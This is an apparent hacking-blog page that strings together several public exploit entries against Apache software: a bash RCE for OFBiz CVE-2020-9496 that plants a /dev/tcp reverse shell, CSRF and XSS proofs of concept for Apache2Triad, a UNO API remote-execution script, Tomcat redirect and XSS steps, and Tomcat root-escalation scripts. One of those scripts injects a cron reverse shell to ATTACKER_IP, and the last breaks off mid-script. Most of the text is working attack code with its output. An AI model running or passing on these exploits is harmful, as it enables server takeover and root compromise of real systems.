# Exploit Title: ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) via Unsafe Deserialization of XMLRPC arguments
# Date: 2021-08-04
# Exploit Author: Álvaro Muñoz, Adrián Díaz (s4dbrd)
# Vendor Homepage: https://ofbiz.apache.org/index.html
# Software Link: https://archive.apache.org/dist/ofbiz/apache-ofbiz-17.12.01.zip
# Version: 17.12.01
# Tested on: Linux
# CVE : CVE-2020-9496
# Reference: https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/
# Description: This CVE was discovered by Alvaro Muñoz, but I have created this POC to automate the process and the necessary requests to successfully exploit it and get RCE.
#!/usr/bin/env bash
# Because the 2 xmlrpc related requets in webtools (xmlrpc and ping) are not using authentication they are vulnerable to unsafe deserialization.
# This issue was reported to the security team by Alvaro Munoz pwntester@github.com from the GitHub Security Lab team.
#
# This vulnerability exists due to Java serialization issues when processing requests sent to /webtools/control/xmlrpc.
# A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request. Successful exploitation would result in arbitrary code execution.
#
# Steps to exploit:
#
# Step 1: Host HTTP Service with python3 (sudo python3 -m http.server 80)
# Step 2: Start nc listener (Recommended 8001).
# Step 3: Run the exploit.
url='https://127.0.0.1' # CHANGE THIS
port=8443 # CHANGE THIS
function helpPanel(){
echo -e "\nUsage:"
echo -e "\t[-i] Attacker's IP"
echo -e "\t[-p] Attacker's Port"
echo -e "\t[-h] Show help pannel"
exit 1
}
function ctrl_c(){
echo -e "\n\n[!] Exiting...\n"
exit 1
}
# Ctrl + C
trap ctrl_c INT
function webRequest(){
echo -e "\n[*] Creating a shell file with bash\n"
echo -e "#!/bin/bash\n/bin/bash -i >& /dev/tcp/$ip/$ncport 0>&1" > shell.sh
echo -e "[*] Downloading YsoSerial JAR File\n"
wget -q https://jitpack.io/com/github/frohoff/ysoserial/master-d367e379d9-1/ysoserial-master-d367e379d9-1.jar
echo -e "[*] Generating a JAR payload\n"
payload=$(java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 "wget $ip/shell.sh -O /tmp/shell.sh" | base64 | tr -d "\n")
echo -e "[*] Sending malicious shell to server...\n" && sleep 0.5
curl -s $url:$port/webtools/control/xmlrpc -X POST -d "<?xml version='1.0'?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns='http://ws.apache.org/xmlrpc/namespaces/extensions'>$payload</serializable></value></member></struct></value></param></params></methodCall>" -k -H 'Content-Type:application/xml' &>/dev/null
echo -e "[*] Generating a second JAR payload"
payload2=$(java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 "bash /tmp/shell.sh" | base64 | tr -d "\n")
echo -e "\n[*] Executing the payload in the server...\n" && sleep 0.5
curl -s $url:$port/webtools/control/xmlrpc -X POST -d "<?xml version='1.0'?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns='http://ws.apache.org/xmlrpc/namespaces/extensions'>$payload2</serializable></value></member></struct></value></param></params></methodCall>" -k -H 'Content-Type:application/xml' &>/dev/null
echo -e "\n[*]Deleting Files..."
rm ysoserial-master-d367e379d9-1.jar && rm shell.sh
}
declare -i parameter_enable=0; while getopts ":i:p:h:" arg; do
case $arg in
i) ip=$OPTARG; let parameter_enable+=1;;
p) ncport=$OPTARG; let parameter_enable+=1;;
h) helpPanel;;
esac
done
if [ $parameter_enable -ne 2 ]; then
helpPanel
else
webRequest
fi
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863110168
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/APACHE2TRIAD-SERVER-STACK-v1.5.4-MULTIPLE-CVE.txt
[+] ISR: ApparitionSec
Vendor:
===============
apache2triad.net
https://sourceforge.net/projects/apache2triad/
Product:
===========
Apache2Triad v1.5.4
Apache2Triad spells instant and facile deployment of web software on any windows server along the lines of the WAMP paradigm
in a point and click manner in just minutes and is a ideal solution for the setup of server farms.
Vulnerability Type(s):
======================
Session Fixation
Cross Site Request Forgery
Persistent Cross Site Scripting
CVE Reference:
==============
CVE-2017-12965 (Session Fixation)
CVE-2017-12970 (Cross Site Request Forgery)
CVE-2017-12971 (Persistent Cross Site Scripting)
This application is old and not actively developed according to the website, yet it is still avail for download so
I release the advisory.
Security Issue(S):
================
CVE-2017-12965
Apache2Triad allows remote attackers to set an arbitrary PHPSESSID cookie, if a Apache2Triad user authenticates using the
attacker controlled PHPSESSID the attacker can then access the Apache2Triad Web application with same level of access
as that of the victim to potentially take over the Apache2Triad system.
e.g.
Pre - Authentication
a4ce6912be9d29a9ba4106c989859e7b
Post - Authentication
a4ce6912be9d29a9ba4106c989859e7b
We see the PHPSESSID is never regenerated, to make matters worse Apache2Triad will happily accept an abitrary attacker
supplied session cookie and persist it. Our evil cookie will get written here "C:\apache2triad\temp" as sess_HACKED123.
set our cookie like,
Attacker lure:
<a href="http://VICTIM-IP/phpsftpd/?PHPSESSID=HACKED123">Important message</a>
Victim logs on using our lure.
HTTP 200 OK
Response cookies
PHPSESSID
value "HACKED123"
path "/"
Request cookies
PHPSESSID "HACKED123"
Since we control the PHP Session ID and it persists across applications we can then jump to "phpxmail"
using above session and have an authenticated session avail to do whatever we wish.
e.g.
http://VICTIM-IP/phpxmail/?PHPSESSID=HACKED123
Now access some arbitrary application resource bypassing normal authentication.
http://VICTIM-IP/phpxmail/main.php?action=servercmd
Tested successfully in Firefox, IE
CVE-2017-12970
Remote attackers who can trick an authenticated Apache2Triad user to visit a malicious webpage or link can execute HTTP Requests
on behalf of the authenticated user, attackers can then add or delete arbitrary users to the affected system.
Tested successfully in Firefox, IE
CVE-2017-12971
Remote attackers can execute arbitrary code that will run in the security context of the victims browser, if
an authenticated user visits an attacker controlled webpage or link.
Since Apache2Triad has Session Fixation flaw, we can leverage this to potentially bypass normal authentication.
XSS payload will get written to the "slimftpd.conf" configuration file under "C:\apache2triad\ftp" directory.
e.g.
<User "\"/><script>alert(document.cookie)</script>">
</User>
Tested successfully in Firefox
Exploit/POC(s):
==============
CVE-2017-12965 (Session Fixation)
1) Create lure with a attacker controlled PHPSESSID, something like...
<a href="http://VICTIM-IP/phpsftpd/?PHPSESSID=HACKED123">You have new messages, logon to view</a>
2) Authenticate to Apache2Triad using that link
3) Open another Web Browser using above attacker supplied link. You can now access the vulnerable
application using same PHPSESSID session cookie from another browser.
CVE-2017-12970 (CSRF)
Add user
<form action="http://VICTIM-IP/phpsftpd/users.php" method="post">
<input type="hidden" name="account" value="PWNU">
<input type="hidden" name="create" value="Create+New+User">
<script>//document.forms[0].submit()</script>
</form>
HTTP Response:
"The account PWNU was sucesfully created"
Create password
<form action="http://VICTIM-IP/phpsftpd/users.php" method="post">
<input type="hidden" name="Username_d" value="PWNU">
<input type="hidden" name="Password_d" value="abc123">
<input type="hidden" name="update" value="Update+Settings">
<input type="hidden" name="account" value="PWNU">
<input type="hidden" name="instructions" value="">
<script>//document.forms[1].submit()</script>
</form>
HTTP Response:
"The account PWNU was sucesfully updated"
Delete users
<form action="http://VICTIM-IP/phpsftpd/users.php" method="post">
<input type="hidden" name="delete" value="Yes">
<input type="hidden" name="account" value="PWNU">
<script>//document.forms[2].submit()</script>
</form>
HTTP Response:
"The account PWNU was sucesfully deleted"
CVE-2017-12971 (XSS)
<form action="http://VICTIM-IP/phpsftpd/users.php" method="post">
<input type="hidden" name="account" value='"/><script>alert(document.cookie)</script>'>
<input type="hidden" name="create" value="Create+New+User">
<script>document.forms[0].submit()</script>
</form>
HTTP Response example:
"PHPSESSID=HACKED123"
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
=============================
Vendor Notification: "No longer being maintained"
August 21, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
# Exploit Title: Apache Xerces-C XML Parser (< 3.1.2) DoS POC
# Date: 2015-05-03
# Exploit Author: beford
# Vendor Homepage: http://xerces.apache.org/#xerces-c
# Version: Versions prior to 3.1.2
# Tested on: Ubuntu 15.04
# CVE : CVE-2015-0252
Apache Xerces-C XML Parser Crashes on Malformed Input
I believe this to be the same issue that was reported on CVE-2015-0252,
posting this in case anyone is interested in reproducing it.
Original advisory:
https://xerces.apache.org/xerces-c/secadv/CVE-2015-0252.txt
$ printf "\xff\xfe\x00\x00\x3c" > file.xml
$ DOMPrint ./file.xml # Ubuntu 15.04 libxerces-c3.1 package
Segmentation fault
$ ./DOMPrint ./file.xml # ASAN Enabled build
=================================================================
==6831==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb5d9d87c
at pc 0x836a721 bp 0xbf8127a8 sp 0xbf812798
READ of size 1 at 0xb5d9d87c thread T0
#0 0x836a720 in xercesc_3_1::XMLReader::refreshRawBuffer()
xercesc/internal/XMLReader.cpp:1719
#1 0x836a720 in xercesc_3_1::XMLReader::xcodeMoreChars(unsigned short*,
unsigned char*, unsigned int) xercesc/internal/XMLReader.cpp:1761
#2 0x837183f in xercesc_3_1::XMLReader::refreshCharBuffer()
xercesc/internal/XMLReader.cpp:576
#3 0x837183f in xercesc_3_1::XMLReader::peekString(unsigned short
const*) xercesc/internal/XMLReader.cpp:1223
#4 0x83ad0ae in xercesc_3_1::ReaderMgr::peekString(unsigned short
const*) xercesc/internal/ReaderMgr.hpp:385
#5 0x83ad0ae in xercesc_3_1::XMLScanner::checkXMLDecl(bool)
xercesc/internal/XMLScanner.cpp:1608
#6 0x83b6469 in xercesc_3_1::XMLScanner::scanProlog()
xercesc/internal/XMLScanner.cpp:1244
#7 0x8d69220 in
xercesc_3_1::IGXMLScanner::scanDocument(xercesc_3_1::InputSource const&)
xercesc/internal/IGXMLScanner.cpp:206
#8 0x83cd3e7 in xercesc_3_1::XMLScanner::scanDocument(unsigned short
const*) xercesc/internal/XMLScanner.cpp:400
#9 0x83ce728 in xercesc_3_1::XMLScanner::scanDocument(char const*)
xercesc/internal/XMLScanner.cpp:408
#10 0x849afc5 in xercesc_3_1::AbstractDOMParser::parse(char const*)
xercesc/parsers/AbstractDOMParser.cpp:601
#11 0x8050bf2 in main src/DOMPrint/DOMPrint.cpp:398
#12 0xb6f5272d in __libc_start_main
(/lib/i386-linux-gnu/libc.so.6+0x1872d)
#13 0x805d3b5 (/ramdisk/DOMPrint+0x805d3b5)
0xb5d9d87c is located 0 bytes to the right of 163964-byte region
[0xb5d75800,0xb5d9d87c)
allocated by thread T0 here:
#0 0xb72c3ae4 in operator new(unsigned int)
(/usr/lib/i386-linux-gnu/libasan.so.1+0x51ae4)
#1 0x8340cce in xercesc_3_1::MemoryManagerImpl::allocate(unsigned int)
xercesc/internal/MemoryManagerImpl.cpp:40
#2 0x8094cb2 in xercesc_3_1::XMemory::operator new(unsigned int,
xercesc_3_1::MemoryManager*) xercesc/util/XMemory.cpp:68
#3 0x8daaaa7 in
xercesc_3_1::IGXMLScanner::scanReset(xercesc_3_1::InputSource const&)
xercesc/internal/IGXMLScanner2.cpp:1284
#4 0x8d6912a in
xercesc_3_1::IGXMLScanner::scanDocument(xercesc_3_1::InputSource const&)
xercesc/internal/IGXMLScanner.cpp:198
#5 0x83cd3e7 in xercesc_3_1::XMLScanner::scanDocument(unsigned short
const*) xercesc/internal/XMLScanner.cpp:400
#6 0x83ce728 in xercesc_3_1::XMLScanner::scanDocument(char const*)
xercesc/internal/XMLScanner.cpp:408
#7 0x849afc5 in xercesc_3_1::AbstractDOMParser::parse(char const*)
xercesc/parsers/AbstractDOMParser.cpp:601
#8 0x8050bf2 in main src/DOMPrint/DOMPrint.cpp:398
#9 0xb6f5272d in __libc_start_main
(/lib/i386-linux-gnu/libc.so.6+0x1872d)
SUMMARY: AddressSanitizer: heap-buffer-overflow
xercesc/internal/XMLReader.cpp:1719
xercesc_3_1::XMLReader::refreshRawBuffer()
"""
# Exploit Title: Apache UNO API RCE
# Date: 2018-09-18
# Exploit Author: sud0woodo
# Vendor Homepage: https://www.apache.org/
# Software Link: https://www.openoffice.org/api/
# Version:
LibreOffice Version: 6.1.2 / OpenOffice 4.1.6
(but really any version with the UNO API included)
# Tested on:
Ubuntu Mate 18.04 with kernel 4.15.0-34-generic (but works platform independent)
Proof of Concept code attached as .txt file.
HackDefense advisory:
https://hackdefense.com/blog/security-advisory-rce-in-apache-uno-api/
HackDefense blogpost:
https://hackdefense.com/blog/finding-RCE-capabilities-in-the-apache-uno-api/
Unauthenticated RCE LibreOffice/OpenOffice with UNO API
This code represents a small proof of concept of an unauthenticted remote code execution using
the Apache OpenOffice UNO API (https://www.openoffice.org/udk/). This code has been tested
against LibreOffice Version: 6.1.1.2 on a Ubuntu Mate 18.04 with kernel 4.15.0-34-generic.
For this PoC to work the target machine needs to run the ServiceManager using an external
interface. The following command was used to test this PoC:
[Ubuntu]
Open a terminal and execute the following command:
soffice --accept='socket,host=0.0.0.0,port=2002;urp;StarOffice.Service'
The above command will start the LibreOffice ServiceManager but this can be executed with the --invisible
flag to prevent the dialogbox from popping up on the target.
I also made a scanner available that can be used to check for the presence of the StarOffice manager running on a machine:
https://sud0woodo.sh/2019/03/06/building-a-go-scanner-to-search-externally-reachable-staroffice-managers/
"""
import uno
from com.sun.star.system import XSystemShellExecute
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--host', help='host to connect to', dest='host', required=True)
parser.add_argument('--port', help='port to connect to', dest='port', required=True)
args = parser.parse_args()
# Define the UNO component
localContext = uno.getComponentContext()
# Define the resolver to use, this is used to connect with the API
resolver = localContext.ServiceManager.createInstanceWithContext(
"com.sun.star.bridge.UnoUrlResolver", localContext )
# Connect with the provided host on the provided target port
print("[+] Connecting to target...")
context = resolver.resolve(
"uno:socket,host={0},port={1};urp;StarOffice.ComponentContext".format(args.host,args.port))
# Issue the service manager to spawn the SystemShellExecute module and execute calc.exe
service_manager = context.ServiceManager
print("[+] Connected to {0}".format(args.host))
shell_execute = service_manager.createInstance("com.sun.star.system.SystemShellExecute")
shell_execute.execute("calc.exe", '',1)
# Exploit Title: Apache Tomcat 9.0.0.M1 - Open Redirect
# Date: 10/04/2018
# Exploit Author: Central InfoSec
# Version: Apache Tomcat 9.0.0.M1 to 9.0.0.11, 8.5.0 to 8.5.33, and 7.0.23 to 7.0.90
# CVE : CVE-2018-11784
# Proof of Concept:
# Identify a subfolder within your application
http://example.com/test/
# Modify the URL to include at least 2 leading slashes before the subfolder and no trailing slash
http://example.com//test
# Browse to the newly created URL and the application will perform a redirection
http://test/
# Exploit Title: Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS)
# Date: 05/21/2019
# Exploit Author: Central InfoSec
# Version: Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93
# CVE : CVE-2019-0221
# Requirements:
# SSI support must be enabled within Apache Tomcat. SSI support is not enabled by default.
# A file (usually "*.shtml") with the "printenv" SSI directive must exist within the web application.
# The file must be accessible.
# Proof of Concept:
# Install a Java Runtime Environment (JRE)
# Download a vulnerable version of Tomcat and extract the contents
# Modify line 19 of the conf\context.xml file to globally enable privileged context
Context privileged="true">
# Modify conf\web.xml to enable the SSI Servlet as per the Apache Tomcat User Guide
# Put the following code in "webapps/ROOT/ssi/printenv.shtml"
<html>
<body>
Echo: <!-- #echo var="QUERY_STRING_UNESCAPED" --> <br/> <br/>
Printenv: <!-- #printenv -->
</body>
</html>
# Run Tomcat
cd bin
catalina run
# Call the following URLs to observe the XSS. You may need to use FireFox. Observe the difference between the "echo" directive which escapes properly and the "printenv" directive which does not escape properly
http://localhost:8080/ssi/printenv.shtml?%3Cbr/%3E%3Cbr/%3E%3Ch1%3EXSS%3C/h1%3E%3Cbr/%3E%3Cbr/%3E
http://localhost:8080/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E
=============================================
- Discovered by: Dawid Golunski
- http://legalhackers.com
- dawid (at) legalhackers.com
- CVE-2016-5425
- Release date: 10.10.2016
- Revision: 1
- Severity: High
=============================================
I. VULNERABILITY
-------------------------
Apache Tomcat (packaging on RedHat-based distros) - Root Privilege Escalation
II. BACKGROUND
-------------------------
"The Apache Tomcat® software is an open source implementation of the
Java Servlet, JavaServer Pages, Java Expression Language and Java WebSocket
technologies. The Java Servlet, JavaServer Pages, Java Expression Language
and Java WebSocket specifications are developed under the Java Community
Process.
The Apache Tomcat software is developed in an open and participatory
environment and released under the Apache License version 2.
The Apache Tomcat project is intended to be a collaboration of the
best-of-breed developers from around the world.
Apache Tomcat software powers numerous large-scale, mission-critical web
applications across a diverse range of industries and organizations.
Some of these users and their stories are listed on the PoweredBy wiki page.
"
http://tomcat.apache.org/
III. INTRODUCTION
-------------------------
Apache Tomcat packages provided by default repositories of RedHat-based
distributions (including CentOS, RedHat, OracleLinux, Fedora, etc.)
create a tmpfiles.d configuration file with insecure permissions which
allow attackers who are able to write files with tomcat user permissions
(for example, through a vulnerability in web application hosted on Tomcat)
to escalate their privileges from tomcat user to root and fully compromise
the target system.
IV. DESCRIPTION
-------------------------
The vulnerability stems from the tomcat.conf file installed by default
by packages on RedHat-based systems with write permissions for the tomcat
group:
[root@centos7 ~]# ls -al /usr/lib/tmpfiles.d/tomcat.conf
-rw-rw-r--. 1 root tomcat 361 Oct 9 23:58 /usr/lib/tmpfiles.d/tomcat.conf
The configuration files in tmpfiles.d are used by systemd-tmpfiles to manage
temporary files including their creation.
Attackers could very easily exploit the weak permissions on tomcat.conf to
inject configuration that creates a rootshell or remote reverse shell that
allows them to execute arbitrary commands with root privileges.
Injected malicious settings would be processed whenever
/usr/bin/systemd-tmpfiles gets executed.
systemd-tmpfiles is executed by default on boot on RedHat-based systems
through systemd-tmpfiles-setup.service service as can be seen below:
---[ /usr/lib/systemd/system/systemd-tmpfiles-setup.service ]---
[...]
ExecStart=/usr/bin/systemd-tmpfiles --create --remove --boot --exclude-prefix=/dev
----------------------------------------------------------------
Depending on the system in use, the execution of systemd-tmpfiles could also
be triggered by other services, cronjobs, startup scripts etc.
The vulnerability could potentially get exploited by remote attackers in
combination with a vulnerable web application hosted on Tomcat if they
managed to find a path traversal (e.g in a file upload feature) or an arbitrary
file write/append vulnerability. This would allow them to append settings
to /usr/lib/tmpfiles.d/tomcat.conf file and achieve code execution with root
privileges without a prior local access/shell on the system.
This vector could prove useful to attackers, for example if they were unable to
obtain a tomcat-privileged shell/codeexec by uploading a .jsp webshell through a
vulnerable file upload feature due to restrictions imposed by Tomcat security
manager, or a read-only webroot etc.
It is worth to note that systemd-tmpfiles does not stop on syntax errors when
processing configuration files which makes exploitation easier as attackers only
need to inject their payload after a new line and do not need to worry
about garbage data potentially prepended by a vulnerable webapp in case of
Arbitrary File Write/Append exploitation.
V. PROOF OF CONCEPT EXPLOIT
-------------------------
-----------[ tomcat-RH-root.sh ]---------
#!/bin/bash
# Apache Tomcat packaging on RedHat-based distros - Root Privilege Escalation PoC Exploit
# CVE-2016-5425
#
# Full advisory at:
# http://legalhackers.com/advisories/Tomcat-RedHat-Pkgs-Root-PrivEsc-Exploit-CVE-2016-5425.html
#
# Discovered and coded by:
# Dawid Golunski
# http://legalhackers.com
#
# Tested on RedHat, CentOS, OracleLinux, Fedora systems.
#
# For testing purposes only.
#
ATTACKER_IP=127.0.0.1
ATTACKER_PORT=9090
echo -e "\n* Apache Tomcat (RedHat distros) - Root PrivEsc PoC CVE-2016-5425 *"
echo -e " Discovered by Dawid Golunski\n"
echo "[+] Checking vulnerability"
ls -l /usr/lib/tmpfiles.d/tomcat.conf | grep 'tomcat'
if [ $? -ne 0 ]; then
echo "Not vulnerable or tomcat installed under a different user than 'tomcat'"
exit 1
fi
echo -e "\n[+] Your system is vulnerable!"
echo -e "\n[+] Appending data to /usr/lib/tmpfiles.d/tomcat.conf..."
cat<<_eof_>>/usr/lib/tmpfiles.d/tomcat.conf
C /usr/share/tomcat/rootsh 4770 root root - /bin/bash
z /usr/share/tomcat/rootsh 4770 root root -
F /etc/cron.d/tomcatexploit 0644 root root - "* * * * * root nohup bash -i >/dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0<&1 2>&1 & \n\n"
_eof_
echo "[+] /usr/lib/tmpfiles.d/tomcat.conf contains:"
cat /usr/lib/tmpfiles.d/tomcat.conf
echo -e "\n[+] Payload injected! Wait for your root shell...\n"
echo -e "Once '/usr/bin/systemd-tmpfiles --create' gets executed (on reboot by tmpfiles-setup.service, by cron, by another service etc.),
the rootshell will be created in /usr/share/tomcat/rootsh.
Additionally, a reverse shell should get executed by crond shortly after and connect to $ATTACKER_IP:$ATTACKER_PORT \n"
--------------[ eof ]--------------------
Example run:
-bash-4.2$ rpm -qa | grep -i tomcat
tomcat-7.0.54-2.el7_1.noarch
-bash-4.2$ cat /etc/redhat-release
CentOS Linux release 7.2.1511 (Core)
-bash-4.2$ id
uid=91(tomcat) gid=91(tomcat) groups=91(tomcat) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
-bash-4.2$ ./tomcat-RH-root.sh
* Apache Tomcat (RedHat distros) - Root PrivEsc PoC CVE-2016-5425 *
Discovered by Dawid Golunski
[+] Checking vulnerability
-rw-rw-r--. 1 root tomcat 43 Oct 10 02:39 /usr/lib/tmpfiles.d/tomcat.conf
[+] Your system is vulnerable!
[+] Appending data to /usr/lib/tmpfiles.d/tomcat.conf...
[+] /usr/lib/tmpfiles.d/tomcat.conf contains:
f /var/run/tomcat.pid 0644 tomcat tomcat -
C /usr/share/tomcat/rootsh 4770 root root - /bin/bash
z /usr/share/tomcat/rootsh 4770 root root -
F /etc/cron.d/tomcatexploit 0644 root root - "* * * * * root nohup bash -i >/dev/tcp/127.0.0.1/9090 0<&1 2>&1 & \n\n"
[+] Payload injected! Wait for your root shell...
Once '/usr/bin/systemd-tmpfiles --create' gets executed (on reboot by tmpfiles-setup.service, by cron, by another service etc.),
the rootshell will be created in /usr/share/tomcat/rootsh.
Additionally, a reverse shell should get executed by crond shortly after and connect to 127.0.0.1:9090
-bash-4.2$ nc -l -p 9090
bash: no job control in this shell
[root@centos7 ~]# id
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:system_cronjob_t:s0-s0:c0.c1023
[root@centos7 ~]# ls -l /usr/share/tomcat/rootsh
ls -l /usr/share/tomcat/rootsh
-rwsrwx---. 1 root root 960392 Aug 2 12:00 /usr/share/tomcat/rootsh
[root@centos7 ~]#
VI. BUSINESS IMPACT
-------------------------
Attackers who have gained access to tomcat user account or the ability to
write files as tomcat user could escalate their privileges to root and fully
compromise the affected system.
As explained in section IV., the vulnerability could potentially get exploited
by remote attackers in combination with certain web application vulnerabilities
to achieve command execution without prior shell access.
VII. SYSTEMS AFFECTED
-------------------------
Multiple versions of Tomcat packages on RedHat-based systems are affected.
The vulnerability was confirmed on Tomcat installed from default repositories
on the following systems:
- CentOS
- Fedora
- Oracle Linux
- RedHat
Refer to information provided by your distribution to obtain an exact list
of vulnerable packages.
Detailes provided by RedHat can be found at:
https://access.redhat.com/security/cve/CVE-2016-5425
VIII. SOLUTION
-------------------------
Adjust permissions on /usr/lib/tmpfiles.d/tomcat.conf file to remove write
permission for the tomcat group.
Alternatively, update to the latest packages provided by your distribution.
Confirm the file permissions after the update.
IX. REFERENCES
-------------------------
http://legalhackers.com
http://legalhackers.com/advisories/Tomcat-RedHat-Pkgs-Root-PrivEsc-Exploit-CVE-2016-5425.html
The source code of the exploit (tomcat-RH-root.sh) can be downloaded from:
http://legalhackers.com/exploits/tomcat-RH-root.sh
CVE-2016-5425
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5425
https://access.redhat.com/security/cve/CVE-2016-5425
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
http://legalhackers.com
XI. REVISION HISTORY
-------------------------
10.10.2016 - Advisory released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
=============================================
- Discovered by: Dawid Golunski
- http://legalhackers.com
- dawid (at) legalhackers.com
- CVE-2016-1240
- Release date: 30.09.2016
- Revision: 1
- Severity: High
=============================================
I. VULNERABILITY
-------------------------
Apache Tomcat packaging on Debian-based distros - Local Root Privilege Escalation
Affected debian packages:
Tomcat 8 <= 8.0.36-2
Tomcat 7 <= 7.0.70-2
Tomcat 6 <= 6.0.45+dfsg-1~deb8u1
Ubuntu systems are also affected. See section VII. for details.
Other systems using the affected debian packages may also be affected.
II. BACKGROUND
-------------------------
"The Apache Tomcat® software is an open source implementation of the
Java Servlet, JavaServer Pages, Java Expression Language and Java WebSocket
technologies. The Java Servlet, JavaServer Pages, Java Expression Language
and Java WebSocket specifications are developed under the Java Community
Process.
The Apache Tomcat software is developed in an open and participatory
environment and released under the Apache License version 2.
The Apache Tomcat project is intended to be a collaboration of the
best-of-breed developers from around the world.
Apache Tomcat software powers numerous large-scale, mission-critical web
applications across a diverse range of industries and organizations.
Some of these users and their stories are listed on the PoweredBy wiki page.
"
http://tomcat.apache.org/
III. INTRODUCTION
-------------------------
Tomcat (6, 7, 8) packages provided by default repositories on Debian-based
distributions (including Debian, Ubuntu etc.) provide a vulnerable
tomcat init script that allows local attackers who have already gained access
to the tomcat account (for example, by exploiting an RCE vulnerability
in a java web application hosted on Tomcat, uploading a webshell etc.) to
escalate their privileges from tomcat user to root and fully compromise the
target system.
IV. DESCRIPTION
-------------------------
The vulnerability is located in the tomcat init script provided by affected
packages, normally installed at /etc/init.d/tomcatN.
The script for tomcat7 contains the following lines:
-----[tomcat7]----
# Run the catalina.sh script as a daemon
set +e
touch "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out
chown $TOMCAT7_USER "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out
-------[eof]------
Local attackers who have gained access to the server in the context of the
tomcat user (for example, through a vulnerability in a web application) would
be able to replace the log file with a symlink to an arbitrary system file
and escalate their privileges to root once Tomcat init script (running as root)
re-opens the catalina.out file after a service restart, reboot etc.
As attackers would already have a tomcat account at the time of exploitation,
they could also kill the tomcat processes to introduce the need for a restart.
V. PROOF OF CONCEPT EXPLOIT
-------------------------
------[ tomcat-rootprivesc-deb.sh ]------
#!/bin/bash
#
# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit
#
# CVE-2016-1240
#
# Discovered and coded by:
#
# Dawid Golunski
# http://legalhackers.com
#
# This exploit targets Tomcat (versions 6, 7 and 8) packaging on
# Debian-based distros including Debian, Ubuntu etc.
# It allows attackers with a tomcat shell (e.g. obtained remotely through a
# vulnerable java webapp, or locally via weak permissions on webapps in the
# Tomcat webroot directories etc.) to escalate their privileges to root.
#
# Usage:
# ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred]
#
# The exploit can used in two ways:
#
# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly
# gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted.
# It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up
# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.)
#
# -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to
# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting.
# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a
# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can
# then add arbitrary commands to the file which will be executed with root privileges by
# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default
# Ubuntu/Debian Tomcat installations).
#
# See full advisory for details at:
# http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html
#
# Disclaimer:
# For testing purposes only. Do no harm.
#
BACKDOORSH="/bin/bash"
BACKDOORPATH="/tmp/tomcatrootsh"
PRIVESCLIB="/tmp/privesclib.so"
PRIVESCSRC="/tmp/privesclib.c"
SUIDBIN="/usr/bin/sudo"
function cleanexit {
# Cleanup
echo -e "\n[+] Cleaning up..."
rm -f $PRIVESCSRC
rm -f $PRIVESCLIB
rm -f $TOMCATLOG
touch $TOMCATLOG
if [ -f /etc/ld.so.preload ]; then
echo -n > /etc/ld.so.preload 2>/dev/null
fi
echo -e "\n[+] Job done. Exiting with code $1 \n"
exit $1
}
function ctrl_c() {
echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation."
cleanexit 0
}
#intro
echo -e "\033[94m \nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\nCVE-2016-1240\n"
echo -e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m"
# Args
if [ $# -lt 1 ]; then
echo -e "\n[!] Exploit usage: \n\n$0 path_to_catalina.out [-deferred]\n"
exit 3
fi
if [ "$2" = "-deferred" ]; then
mode="deferred"
else
mode="active"
fi
# Priv check
echo -e "\n[+] Starting the exploit in [\033[94m$mode\033[0m] mode with the following privileges: \n`id`"
id | grep -q tomcat
if [ $? -ne 0 ]; then
